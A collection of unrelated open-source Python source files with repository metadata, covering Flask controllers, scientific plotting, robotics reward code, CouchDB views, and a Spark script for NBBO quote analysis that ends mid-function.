commit_options = True
fork_test_form.regression_test.choices = [(regression_test.id, regression_test)
for regression_test in RegressionTest.query.all()]
if fork_test_form.add.data and fork_test_form.validate_on_submit():
import requests
regression_tests = fork_test_form.regression_test.data
commit_hash = fork_test_form.commit_hash.data
repo = g.github['repository']
platforms = fork_test_form.platform.data
api_url = ('https://api.github.com/repos/{user}/{repo}/commits/{hash}').format(
user=username, repo=repo, hash=commit_hash
)
# Show error if github fails to recognize commit
response = requests.get(api_url)
if response.status_code == 500:
fork_test_form.commit_hash.errors.append('Error contacting Github')
elif response.status_code != 200:
fork_test_form.commit_hash.errors.append('Wrong Commit Hash')
else:
add_test_to_kvm(username, commit_hash, platforms, regression_tests)
return redirect(url_for('custom.index'))
populated_categories = g.db.query(regressionTestLinkTable.c.category_id).subquery()
categories = Category.query.filter(Category.id.in_(populated_categories)).order_by(Category.name.asc()).all()
tests = Test.query.filter(and_(TestFork.user_id == g.user.id, TestFork.test_id == Test.id)).order_by(
Test.id.desc()).limit(50).all()
return {
'addTestFork': fork_test_form,
'commit_options': commit_options,
'tests': tests,
'TestType': TestType,
'GitUser': username,
'categories': categories,
'customize': True
}
def add_test_to_kvm(username, commit_hash, platforms, regression_tests):
"""
Create new tests and add it to CustomizedTests based on parameters.
:param username: git username required to find fork
:type username: str
:param commit_hash: commit hash of the repo user selected to run test
:type commit_hash: str
:param platforms: platforms user selected to run test
:type platforms: list
:param regression_tests: regression tests user selected to run tests
:type regression_tests: list
"""
fork_url = ('https://github.com/{user}/{repo}.git').format(
user=username, repo=g.github['repository']
)
fork = Fork.query.filter(Fork.github == fork_url).first()
if fork is None:
fork = Fork(fork_url)
g.db.add(fork)
g.db.commit()
for platform in platforms:
platform = TestPlatform.from_string(platform)
test = Test(platform, TestType.commit, fork.id, 'master', commit_hash)
g.db.add(test)
g.db.commit()
for regression_test in regression_tests:
customized_test = CustomizedTest(test.id, regression_test)
g.db.add(customized_test)
test_fork = TestFork(g.user.id, test.id)
g.db.add(test_fork)
g.db.commit()
|
satyammittal/sample-platform
|
mod_customized/controllers.py
|
Python
|
isc
| 5,822 | 0.002233 |
#!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
from check_eclipse_syntax import checkEclipseSyntax
from compile_error import CompileError
import unittest
ERROR_TEST = """public class HelloWorld {
public static void main(String[] args)
// Prints "Hello, World" to the terminal window.
System.out.println("Hello, World)
}
}
"""
class TestStringMethods(unittest.TestCase):
def test_syntax_ok(self):
toTest = checkEclipseSyntax('public class Hello{ int a= 5;}')
self.assertTrue(toTest is None)
def test_syntax_error(self):
toTest = checkEclipseSyntax(ERROR_TEST)
self.assertEqual(toTest[0], [1, 2, 3, 4, 5])
self.assertEqual(toTest[1], [3, 5, 5, 5, 5])
if __name__ == '__main__':
unittest.main()
|
naturalness/unnaturalcode
|
unnaturalcode/test_eclipse.py
|
Python
|
agpl-3.0
| 1,489 | 0.012089 |
#!/usr/bin/env python3
# -*- coding: utf8 -*-
# Gaik Tamazian, 2019
# mail (at) gtamazian (dot) com
"""Routines for producing synteny plots."""
import gzip
import sys
from functools import reduce
from operator import itemgetter
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.patches import Polygon
from matplotlib.patches import Rectangle
import numpy as np
assert sys.version_info >= (3, 5), "Python 3.5 or higher required"
def load_ref_config(config_fname):
"""
Load configuration of reference genome chromosomes.
The contiguration file contains five columns:
1. chromosome name
2. chromosome ID
3. chromosome length in bp
4. start and end positions of a centromere separated by dash, or
NA if the centromere information is missing
:param config_fname: a name of the reference chromosome
configuration file
:returns: a list of 5-tuples representing reference genome
chromosomes; each tuple contain a chromosome name, ID, length in
bp, and start and end positions of its centromere
"""
r = []
with open(config_fname) as config_file:
for line in config_file:
line = line.rstrip()
chr_name, chr_id, chr_len, cent_s, cent_e = \
line.split(None, 4)
chr_len = int(chr_len)
cent_s = int(cent_s) if cent_s != "None" else None
cent_e = int(cent_e) if cent_e != "None" else None
r.append((chr_name, chr_id, chr_len, cent_s, cent_e))
return r
def build_ref_config_file(chr2acc_fname, agp_fnames):
"""
Build a configuration file of reference genome chromosomes from a
chr2acc file and a series of AGP files that describe the assembled
chromosomes.
:param chr2acc_fname: a name of a chr2acc file
:param agp_fnames: a list of reference chromosome AGP files
:returns: a list of the configuration file
"""
acc2chr = {}
with open(chr2acc_fname) as chr2acc_file:
acc2chr = {x[1]: x[0] for x in
map(lambda s: s.split('\t', 1),
filter(lambda s: not s.startswith('#'),
map(str.rstrip,
chr2acc_file.readlines())))}
chr_lengths = {}
# values of the chr_centromeres dictionary are 2-tuples of start and
# end positions of a centromere on a chromosome
chr_centromeres = {}
for k in agp_fnames:
with gzip.open(k, "rt") as agp_file:
lines = map(lambda x: (x[0], int(x[1]), int(x[2])) +
tuple(x[3:]),
map(lambda s: s.split('\t', 8),
map(str.rstrip,
filter(lambda s: not s.startswith('#'),
agp_file.readlines()))))
lines = sorted(lines, key=itemgetter(1))
chr_id = set(map(itemgetter(0), lines))
assert len(chr_id) == 1, \
"multiple chromosomes in an AGP file"
chr_id = chr_id.pop()
centromere = list(filter(lambda x: x[6] == "centromere",
lines))
if centromere:
assert len(centromere) == 1, "multiple centromeres"
centromere = centromere[0]
cent_start, cent_end = centromere[1], centromere[2]
assert chr_id not in chr_centromeres or \
chr_centromeres[chr_id] == (cent_start, cent_end), \
"conflicting centromere records"
chr_centromeres[chr_id] = (cent_start, cent_end)
else:
chr_centromeres[chr_id] = (None, None)
chr_len = lines[-1][2]
assert chr_id not in chr_lengths or \
chr_lengths[chr_id] == chr_len, \
"conflicting chromosome lengths"
chr_lengths[chr_id] = chr_len
return [(v, k, chr_lengths[k]) + chr_centromeres[k]
for k, v in acc2chr.items()]
def plot_frame(ref_chrom_config, p):
"""
Plot a frame of reference chromosomes for synteny blocks based on
them.
:param ref_chrom_config: a list of 5-tuples describing the reference
chromosomes as returned by the load_ref_config function.
:param p: a plotting parameter; its value should be between 10 and
100
:returns: a 2-tuple which first element is the plot frame Figure
object and the second element is the list of the AxesSubplot
objects
"""
fig, axes = plt.subplots(ncols=1, nrows=len(ref_chrom_config))
max_len = reduce(max, map(itemgetter(2), ref_chrom_config))
shift = max_len / 30
for ax, chrom in zip(axes, ref_chrom_config):
chr_name, _, chr_len, _, _ = chrom
ax.set_xlim([-shift, max_len])
ax.set_ylim([-p, p])
ax.axis('off')
ax.text(-shift, 0, chr_name, horizontalalignment="right",
verticalalignment="center")
ax.add_line(Line2D([0, chr_len], [0, 0], color="black",
linewidth=0.5))
return fig, axes
def add_centromeres(fig, ref_chrom_config, p, style):
"""
Add centromeres to a reference chromosome frame.
:param fig: a Figure object of a reference chromosome frame
:param ref_chrom_config: a list of 5-tuples describing the reference
chromosomes as returned by the load_ref_config function
:param p: a plotting parameter; its value should be between 10 and
100
:returns: the Figure object of the reference chromosome frame with
added centromeres
"""
assert style in {"triangle", "butterfly"}, \
"incorrect centromere style"
for ax, chrom in zip(fig.get_axes(), ref_chrom_config):
_, _, _, cent_s, cent_e = chrom
if cent_s is not None and cent_e is not None:
ax.add_patch(Polygon(np.array(
[[cent_s, p], [cent_e, p],
[(cent_s + cent_e)/2, p/5]]), color="black"))
if style == "butterfly":
ax.add_patch(Polygon(np.array(
[[cent_s, -p], [cent_e, -p],
[(cent_s + cent_e)/2, -p/5]]), color="black"))
return fig
def extend_frame(axes, p):
"""
Extend a reference chromosome frame to add one more track of
synteny blocks.
:param axes: a list of the AxesSubplot objects returned by the
plot_frame function
:param p: a plotting parameter; its value should be between 150
and 300
:returns: the list of the AxesSubplot objects which correspond to
the extended reference chromosome frame
"""
for ax in axes:
y_min, y_max = ax.get_ylim()
y_min -= 2*p
ax.set_ylim((y_min, y_max))
return axes
def add_synteny_block(ref_chrom_config, axes, chrom, start, end,
strand, e_color, f_color, p):
"""
Add a synteny block to the reference chromosome frame.
:param ref_chrom_config: a list of 5-tuples describing the reference
chromosomes as returned by the load_ref_config function
:param axes: a list of the AxesSubplot objects returned by the
plot_frame function
:param chrom: the chromosome a syntenic block is located on
:param start: the start position of a syntenic block
:param end: the end position of a syntenic block
:param strand: the syntenic block orientation ('+', '-', or None)
:param e_color: color of the block edge
:param f_color: color the block is filled in
:param p: a plotting parameter; its value should be between 150 and
300
:returns: the list of the AxesSubplot objects with the added synteny
block
"""
global_x_max = reduce(max, map(lambda x: x.get_xlim()[1], axes))
alpha = global_x_max / 100
chr_dict = {v: k for k, v in enumerate(map(itemgetter(1),
ref_chrom_config))}
ax = axes[chr_dict[chrom]]
_, x_max = ax.get_xlim()
y_min, _ = ax.get_ylim()
assert strand is None or strand in {'+', '-'}, "incorrect strand"
l = end - start
if l < global_x_max / 300:
return axes
if strand is None:
r = Rectangle((start, y_min + p/4),
height=3*p/2, width=end-start,
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
ax.add_patch(r)
else:
alpha = x_max/(2*p)
if strand == '+':
if l > alpha:
p = Polygon(np.array([[start, y_min + 7*p/4],
[end - alpha, y_min + 7*p/4],
[end, y_min + p],
[end - alpha, y_min + p/4],
[start, y_min + p/4]]),
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
else:
p = Polygon(np.array([[start, y_min + 7*p/4],
[end, p],
[start, y_min + p/4]]),
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
else:
if l > alpha:
p = Polygon(np.array([[end, y_min + 7*p/4],
[start + alpha, y_min + 7*p/4],
[start, y_min + p],
[start + alpha, y_min + p/4],
[end, y_min + p/4]]),
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
else:
p = Polygon(np.array([[end, y_min + 7*p/4],
[start, y_min + p],
[end, y_min + p/4]]),
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
ax.add_patch(p)
return axes
|
gtamazian/bioformats
|
bioformats/synteny_plot.py
|
Python
|
mit
| 10,165 | 0.000197 |
# This file is generated by /tmp/buildd/python-numpy-1.8.2/setup.py
# It contains system_info results at the time of building this package.
__all__ = ["get_info","show"]
blas_info={'libraries': ['blas'], 'library_dirs': ['/usr/lib'], 'language': 'f77'}
lapack_info={'libraries': ['lapack'], 'library_dirs': ['/usr/lib'], 'language': 'f77'}
atlas_threads_info={}
blas_opt_info={'libraries': ['blas'], 'library_dirs': ['/usr/lib'], 'define_macros': [('NO_ATLAS_INFO', 1)], 'language': 'f77'}
openblas_info={}
atlas_blas_threads_info={}
lapack_opt_info={'libraries': ['lapack', 'blas'], 'library_dirs': ['/usr/lib'], 'define_macros': [('NO_ATLAS_INFO', 1)], 'language': 'f77'}
atlas_info={}
lapack_mkl_info={}
blas_mkl_info={}
atlas_blas_info={}
mkl_info={}
def get_info(name):
g = globals()
return g.get(name, g.get(name + "_info", {}))
def show():
for name,info_dict in globals().items():
if name[0] == "_" or type(info_dict) is not type({}): continue
print(name + ":")
if not info_dict:
print(" NOT AVAILABLE")
for k,v in info_dict.items():
v = str(v)
if k == "sources" and len(v) > 200:
v = v[:60] + " ...\n... " + v[-60:]
print(" %s = %s" % (k,v))
|
ruibarreira/linuxtrail
|
usr/lib/python2.7/dist-packages/numpy/distutils/__config__.py
|
Python
|
gpl-3.0
| 1,269 | 0.020489 |
import numpy as np
from gym.spaces import Box
from metaworld.envs import reward_utils
from metaworld.envs.asset_path_utils import full_v2_path_for
from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set
class SawyerHammerEnvV2(SawyerXYZEnv):
HAMMER_HANDLE_LENGTH = 0.14
def __init__(self):
hand_low = (-0.5, 0.40, 0.05)
hand_high = (0.5, 1, 0.5)
obj_low = (-0.1, 0.4, 0.0)
obj_high = (0.1, 0.5, 0.0)
goal_low = (0.2399, .7399, 0.109)
goal_high = (0.2401, .7401, 0.111)
super().__init__(
self.model_name,
hand_low=hand_low,
hand_high=hand_high,
)
self.init_config = {
'hammer_init_pos': np.array([0, 0.5, 0.0]),
'hand_init_pos': np.array([0, 0.4, 0.2]),
}
self.goal = self.init_config['hammer_init_pos']
self.hammer_init_pos = self.init_config['hammer_init_pos']
self.obj_init_pos = self.hammer_init_pos.copy()
self.hand_init_pos = self.init_config['hand_init_pos']
self.nail_init_pos = None
self._random_reset_space = Box(np.array(obj_low), np.array(obj_high))
self.goal_space = Box(np.array(goal_low), np.array(goal_high))
@property
def model_name(self):
return full_v2_path_for('sawyer_xyz/sawyer_hammer.xml')
@_assert_task_is_set
def evaluate_state(self, obs, action):
(
reward,
reward_grab,
reward_ready,
reward_success,
success
) = self.compute_reward(action, obs)
info = {
'success': float(success),
'near_object': reward_ready,
'grasp_success': reward_grab >= 0.5,
'grasp_reward': reward_grab,
'in_place_reward': reward_success,
'obj_to_target': 0,
'unscaled_reward': reward,
}
return reward, info
def _get_id_main_object(self):
return self.unwrapped.model.geom_name2id('HammerHandle')
def _get_pos_objects(self):
return np.hstack((
self.get_body_com('hammer').copy(),
self.get_body_com('nail_link').copy()
))
def _get_quat_objects(self):
return np.hstack((
self.sim.data.get_body_xquat('hammer'),
self.sim.data.get_body_xquat('nail_link')
))
def _set_hammer_xyz(self, pos):
qpos = self.data.qpos.flat.copy()
qvel = self.data.qvel.flat.copy()
qpos[9:12] = pos.copy()
qvel[9:15] = 0
self.set_state(qpos, qvel)
def reset_model(self):
self._reset_hand()
# Set position of box & nail (these are not randomized)
self.sim.model.body_pos[self.model.body_name2id(
'box'
)] = np.array([0.24, 0.85, 0.0])
# Update _target_pos
self._target_pos = self._get_site_pos('goal')
# Randomize hammer position
self.hammer_init_pos = self._get_state_rand_vec() if self.random_init \
else self.init_config['hammer_init_pos']
self.nail_init_pos = self._get_site_pos('nailHead')
self.obj_init_pos = self.hammer_init_pos.copy()
self._set_hammer_xyz(self.hammer_init_pos)
return self._get_obs()
@staticmethod
def _reward_quat(obs):
# Ideal laid-down wrench has quat [1, 0, 0, 0]
# Rather than deal with an angle between quaternions, just approximate:
ideal = np.array([1., 0., 0., 0.])
error = np.linalg.norm(obs[7:11] - ideal)
return max(1.0 - error / 0.4, 0.0)
@staticmethod
def _reward_pos(hammer_head, target_pos):
pos_error = target_pos - hammer_head
a = 0.1 # Relative importance of just *trying* to lift the hammer
b = 0.9 # Relative importance of hitting the nail
lifted = hammer_head[2] > 0.02
in_place = a * float(lifted) + b * reward_utils.tolerance(
np.linalg.norm(pos_error),
bounds=(0, 0.02),
margin=0.2,
sigmoid='long_tail',
)
return in_place
def compute_reward(self, actions, obs):
hand = obs[:3]
hammer = obs[4:7]
hammer_head = hammer + np.array([.16, .06, .0])
# `self._gripper_caging_reward` assumes that the target object can be
# approximated as a sphere. This is not true for the hammer handle, so
# to avoid re-writing the `self._gripper_caging_reward` we pass in a
# modified hammer position.
# This modified position's X value will perfect match the hand's X value
# as long as it's within a certain threshold
hammer_threshed = hammer.copy()
threshold = SawyerHammerEnvV2.HAMMER_HANDLE_LENGTH / 2.0
if abs(hammer[0] - hand[0]) < threshold:
hammer_threshed[0] = hand[0]
reward_quat = SawyerHammerEnvV2._reward_quat(obs)
reward_grab = self._gripper_caging_reward(
actions, hammer_threshed,
object_reach_radius=0.01,
obj_radius=0.015,
pad_success_thresh=0.02,
xz_thresh=0.01,
high_density=True,
)
reward_in_place = SawyerHammerEnvV2._reward_pos(
hammer_head,
self._target_pos
)
reward = (2.0 * reward_grab + 6.0 * reward_in_place) * reward_quat
# Override reward on success. We check that reward is above a threshold
# because this env's success metric could be hacked easily
success = self.data.get_joint_qpos('NailSlideJoint') > 0.09
if success and reward > 5.:
reward = 10.0
return (
reward,
reward_grab,
reward_quat,
reward_in_place,
success,
)
|
rlworkgroup/metaworld
|
metaworld/envs/mujoco/sawyer_xyz/v2/sawyer_hammer_v2.py
|
Python
|
mit
| 5,835 | 0.000343 |
from random import randint
import os
PAN_HOST = "pan.baidu.com"
PAN_INDEX = "http://" + PAN_HOST
DISK_HOME = PAN_INDEX + '/disk/home'
FILE_MANAGER = PAN_INDEX + "/api/filemanager"
CLOUD_DL = PAN_INDEX + "/rest/2.0/services/cloud_dl"
PASSPORT_HOST = 'passport.baidu.com'
PASSPORT_INDEX = "https://" + PASSPORT_HOST
PASSPORT_API = PASSPORT_INDEX + "/v2/api"
USERAGENTLIST = [ 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',]
USERAGENT = USERAGENTLIST[randint(0,len(USERAGENTLIST)-1)]
GREEN = u"\033[42m%s\033[m"
BLUE = u"\033[44m%s\033[m"
RED = u"\033[41m%s\033[0m"
WHITE= u"%s"
SAVINGPATH = os.path.expanduser("~/Downloads")
|
xiviwo/baiducloud
|
const.py
|
Python
|
gpl-3.0
| 977 | 0.012282 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from wtforms import validators
from jinja2 import Markup
from flask.ext.admin.contrib.sqla import ModelView
from studio.core.engines import db
from suibe.models import SlideModel, ArticleModel
from .forms import CKTextAreaField
class Article(ModelView):
create_template = 'panel/article_edit.html'
edit_template = 'panel/article_edit.html'
column_labels = {'id': 'ID',
'title': '标题',
'is_sticky': '置顶',
'channel': '频道',
'date_published': '发布时间',
'date_created': '创建时间'}
column_list = ['id', 'channel', 'is_sticky', 'title',
'date_published', 'date_created']
column_searchable_list = ['title', ]
column_default_sort = ('date_published', True)
form_extra_fields = {
'content': CKTextAreaField('内容',
validators=[validators.Required()]),
}
def __init__(self, **kwargs):
super(Article, self).__init__(ArticleModel, db.session, **kwargs)
def create_form(self, obj=None):
form = super(Article, self).create_form()
delattr(form, 'date_created')
return form
def edit_form(self, obj=None):
form = super(Article, self).edit_form(obj=obj)
delattr(form, 'date_created')
return form
class Slide(ModelView):
column_labels = {'id': 'ID',
'order': '排序',
'title': '标题',
'describe': '描述',
'image': '图片链接',
'link': '链接',
'date_created': '创建时间'}
column_list = ['id', 'order', 'title', 'describe', 'image', 'link', 'date_created']
column_default_sort = ('order', True)
form_args = {
'image': {'label': '图片', 'validators': [validators.Required(),
validators.URL()]},
'link': {'label': '链接', 'validators': [validators.Required(),
validators.URL()]},
}
def _show_image(self, context, model, name):
image = model.image.strip() if model.image else ''
return Markup('<img src=%s width=200 height=200 />' % image)
column_formatters = {
'image': _show_image,
}
def __init__(self, **kwargs):
super(Slide, self).__init__(SlideModel, db.session, **kwargs)
def create_form(self, obj=None):
form = super(Slide, self).create_form()
delattr(form, 'date_created')
return form
def edit_form(self, obj=None):
form = super(Slide, self).edit_form(obj=obj)
delattr(form, 'date_created')
return form
|
qisanstudio/qsapp-suibe
|
src/suibe/panel/article.py
|
Python
|
mit
| 2,836 | 0.000724 |
# -*- coding: utf-8 -*-
import mock
import pytest
from future.moves.urllib.parse import urlparse, urljoin
from addons.base.tests import views
from addons.base.tests.utils import MockFolder
from addons.mendeley.models import Mendeley
from addons.mendeley.tests.utils import MendeleyTestCase, mock_responses
from tests.base import OsfTestCase
from addons.mendeley.provider import MendeleyCitationsProvider
from addons.mendeley.serializer import MendeleySerializer
API_URL = 'https://api.mendeley.com'
pytestmark = pytest.mark.django_db
class TestAuthViews(MendeleyTestCase, views.OAuthAddonAuthViewsTestCaseMixin, OsfTestCase):
pass
class TestConfigViews(MendeleyTestCase, views.OAuthCitationAddonConfigViewsTestCaseMixin, OsfTestCase):
folder = MockFolder()
Serializer = MendeleySerializer
client = Mendeley
citationsProvider = MendeleyCitationsProvider
foldersApiUrl = urljoin(API_URL, 'folders')
documentsApiUrl = urljoin(API_URL, 'documents')
mockResponses = mock_responses
@mock.patch('addons.mendeley.models.NodeSettings._fetch_folder_name', mock.PropertyMock(return_value='Fake Name'))
def test_deauthorize_node(self):
super(TestConfigViews, self).test_deauthorize_node()
|
Johnetordoff/osf.io
|
addons/mendeley/tests/test_views.py
|
Python
|
apache-2.0
| 1,232 | 0.004058 |
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Visualize the system cells and MPI domains. Run ESPResSo in parallel
to color particles by node. With OpenMPI, this can be achieved using
``mpiexec -n 4 ./pypresso ../samples/visualization_cellsystem.py``.
Set property ``system.cell_system.node_grid = [i, j, k]`` (with ``i * j * k``
equal to the number of MPI ranks) to change the way the cellsystem is
partitioned. Only the domain of MPI rank 0 will be shown in wireframe.
"""
import espressomd
import espressomd.visualization_opengl
import numpy as np
required_features = ["LENNARD_JONES"]
espressomd.assert_features(required_features)
box = [40, 30, 20]
system = espressomd.System(box_l=box)
visualizer = espressomd.visualization_opengl.openGLLive(
system,
window_size=[800, 800],
background_color=[0, 0, 0],
camera_position=[20, 15, 80],
particle_coloring='node',
draw_nodes=True,
draw_cells=True)
system.time_step = 0.0005
system.cell_system.set_regular_decomposition(use_verlet_lists=True)
system.cell_system.skin = 0.4
#system.cell_system.node_grid = [i, j, k]
for i in range(100):
system.part.add(pos=box * np.random.random(3))
system.non_bonded_inter[0, 0].lennard_jones.set_params(
epsilon=100.0, sigma=1.0, cutoff=3.0, shift="auto")
energy = system.analysis.energy()
print(f"Before Minimization: E_total = {energy['total']:.2e}")
system.integrator.set_steepest_descent(f_max=50, gamma=30.0,
max_displacement=0.001)
system.integrator.run(10000)
system.integrator.set_vv()
energy = system.analysis.energy()
print(f"After Minimization: E_total = {energy['total']:.2e}")
print("Tune skin")
system.cell_system.tune_skin(0.1, 4.0, 1e-1, 1000)
print(system.cell_system.get_state())
system.thermostat.set_langevin(kT=1, gamma=1, seed=42)
visualizer.run(1)
|
espressomd/espresso
|
samples/visualization_cellsystem.py
|
Python
|
gpl-3.0
| 2,509 | 0.000399 |
# -*- coding: utf-8 -*-
"""
################################################
Plataforma ActivUFRJ
################################################
:Author: *Núcleo de Computação Eletrônica (NCE/UFRJ)*
:Contact: carlo@nce.ufrj.br
:Date: $Date: 2009-2010 $
:Status: This is a "work in progress"
:Revision: $Revision: 0.01 $
:Home: `LABASE `__
:Copyright: ©2009, `GPL
"""
from couchdb.design import ViewDefinition
import core.database
################################################
# CouchDB Permanent Views
################################################
# Retorna lista de questões usadas num quiz, com todas as informações adicionais
#
# Uso: database.ACTIVDB.view('activity/by_group',startkey=[registry_id],endkey=[id, {}, {}])
activity_by_group = ViewDefinition('activity', 'by_group', \
'''
function(doc) {
if (doc.type=="activity") {
emit([doc.registry_id, doc.group_id, doc.status], 1);
}
}
''',
u'''
function(keys, values) {
return sum(values);
}
''')
# Retorna lista de questões usadas num quiz, com todas as informações adicionais
#
# Uso: database.ACTIVDB.view('activity/finalized',startkey=[registry_id],endkey=[id, {}, {}])
activity_finalized_and_groups = ViewDefinition('activity', 'finalized_and_groups', \
'''
function(doc) {
if (doc.type=="activity" && doc.status == "finalizado") {
emit([doc.registry_id, doc.group_id, doc.data_cri, 1], doc);
}
if (doc.type=="group" ) {
emit([doc.registry_id, doc._id, doc.data_cri, 0], doc);
}
}
''')
# Retorna lista de questões usadas num quiz, sem a informação de grupos
#
# Uso: database.ACTIVDB.view('activity/finalized',startkey=[registry_id],endkey=[id, {}, {}])
activity_list_by_registry = ViewDefinition('activity', 'list_by_registry', \
'''
function (doc) {
if (doc.type=="activity" ) {
emit([doc.registry_id, doc.group_id, doc.data_cri,1], doc);
}
if (doc.type=="group") {
emit([doc.registry_id, doc._id, doc.data_cri, 0], doc);
}
}
''')
# Retorna lista de questões usadas num quiz, com todas as informações adicionais
#
# Uso: database.ACTIVDB.view('activity/finalized',startkey=[registry_id],endkey=[id, {}, {}])
activity_Nfinalized = ViewDefinition('activity', 'Nfinalized', \
'''
function(doc) {if (doc.type=="activity" && (!(doc.status == "finalizado"))) {
emit([doc.registry_id, doc.group_id, doc.data_cri, 1], doc);
}
if (doc.type=="group" ) {
emit([doc.registry_id, doc._id, doc.data_cri, 0], doc);
}
}
''')
activity_pendent = ViewDefinition('activity', 'pendent', \
'''
function(doc) {
if (doc.type=="activity" && (!(doc.status == "finalizado"))) {
for (e in doc.encarregados){
emit([doc.encarregados[e], doc.registry_id, doc.data_cri, 1], doc);
}
}
if (doc.type=="activity" && (!(doc.status == "finalizado"))) {
for (e in doc.encarregados){
emit([doc.encarregados[e], doc.registry_id, doc.data_cri, 0], doc.group_id);
}
}
}
''',)
ViewDefinition.sync_many(core.database.ACTIVDB, [
activity_by_group, \
activity_Nfinalized, \
activity_pendent, \
activity_finalized_and_groups, \
activity_list_by_registry \
])
|
labase/activnce
|
main/activity/database.py
|
Python
|
gpl-2.0
| 5,622 | 0.012132 |
# encoding: utf-8
from setuptools import setup, find_packages
import toasyncio
setup(
name='toasyncio',
packages=find_packages(exclude=['tests']),
install_requires=(
'tornado>=4.2',
'asyncio',
),
author=toasyncio.__author__,
version=toasyncio.__version__,
author_email=", ".join("{email}".format(**a) for a in toasyncio.author_info),
long_description=open('README.rst', 'r').read(),
license='MIT',
keywords=(
"tornado",
"asyncio",
),
url='https://github.com/mosquito/toasyncio',
description='Transparent convert any asyncio futures and inline yield methods to tornado futures.',
zip_safe=False,
classifiers=[
'Environment :: Console',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
)
|
alternativehood/toasyncio
|
setup.py
|
Python
|
mit
| 897 | 0.003344 |
# Project : Dlab-Finance
# W251 Nital Patwa and Ritesh Soni
# Desc : This program counts for each exchange, the #of times it produced best bid (or ask) and average size of bid (or ask)
# The purpose is to understand what roles exchanges such as BATS play.
# Usage Instructions
# Change inputDir for daily quote file and outputDir for location of output
# ./submit.sh 4 8G nbboex.py
# ^#of nodes
'''
fields of dailyquotes file taqquote
[0:8]HHMMSSXXX
[9] text EXCHANGE N Nyse T/Q NASDAQ
[10:25] text symbol 6+10
[26:36] bid price 7+4
[37:43] bid size (units)
[44:54] ask price 7+4
[55:61] ask size
[62] text Condition of quote
[63:66] market maker
[67] bid exchange
[68] ask aexchange
[69:84] int seqno
[85] int bbo indicator
[86] int NASDAQ BBO indocator
[87] text cancel/correction A=Normal B=Cancel C=Corrected-price
[88] text C=CTA N=UTP
[90] text Retail interest indicator
[...]
'''
import sys
from random import random
from operator import add
from pyspark import SparkContext, SparkConf
inputDir="/global/scratch/npatwa/sparkinput/taqquote20100505"
outputDir="/global/scratch/npatwa/sparkoutput/nbboexsize20100505/"
def processquote (record):
# Sort by index created using zipWithIndex to preserve ordering in tied timestamps
listOrig = sorted(record[1])
list1 = [rec for rec in listOrig if ((int(rec[1]) >= 93000000) and (int(rec[1]) <= 160000000))] # filter the list for regular stock hours
# Setup exchangeList for NBBO calculation
exchangeList = ['A','B','C','D','I','J','K','M','N','T','P','S','Q','W','X','Y','Z']
bidList = [0]*len(exchangeList)
bidSize = [0]*len(exchangeList)
askList = [sys.maxsize]*len(exchangeList)
askSize = [0]*len(exchangeList)
nbboList=[]
bbExCnt = [0]*len(exchangeList)
baExCnt = [0]*len(exchangeList)
bbExSize = [0]*len(exchangeList)
baExSize = [0]*len(exchangeList)
currtime=0
# Iterate over the list to calculate nbbo
for i in range(len(list1)):
if (currtime != int(list1[i][1])): # change of millisecond
# Find NBBO and exchange count
if (max(bidList) > 0) or (min(askList) < sys.maxsize):
# Output key Value pairs where
# Key : (<Stock Ticker>, <Time in ms seconds>)
# Value : (<best-bid>,<best-bid-exchange>,<best-bid-size>, <best-ask>,<best-ask-exchange>,<best-ask-size> )
maxbid = max(bidList)
minask = min(askList)
bbEx = bidList.index(maxbid) #index of exchange showing max bid
baEx = askList.index(minask) #index of exchange showing min ask
bbSize = bidSize[bbEx] #size
baSize = askSize[baEx] #size
bbExCnt[bbEx] += 1
baExCnt[baEx] += 1
bbExSize[bbEx] += bbSize
baExSize[bbEx] += baSize
currtime=int(list1[i][1])
# set the latest bid and ask if bid & ask are not zero and if bidsize and asksize are not zero
# Backout the bid or ask if either is 0
if ((list1[i][2] != 0) & (list1[i][3] != 0)):
bidList[exchangeList.index(list1[i][6])] = list1[i][2]
bidSize[exchangeList.index(list1[i][6])] = list1[i][3]
elif ((list1[i][2] == 0) or (list1[i][8] == 'B')):
bidList[exchangeList.index(list1[i][6])] = 0
bidSize[exchangeList.index(list1[i][6])] = 0 # size
if ((list1[i][4] != 0) & (list1[i][5] != 0)):
askList[exchangeList.index(list1[i][7])] = list1[i][4]
askSize[exchangeList.index(list1[i][7])] = list1[i][5]
elif ((list1[i][4] == 0) or (list1[i][8] == 'B')):
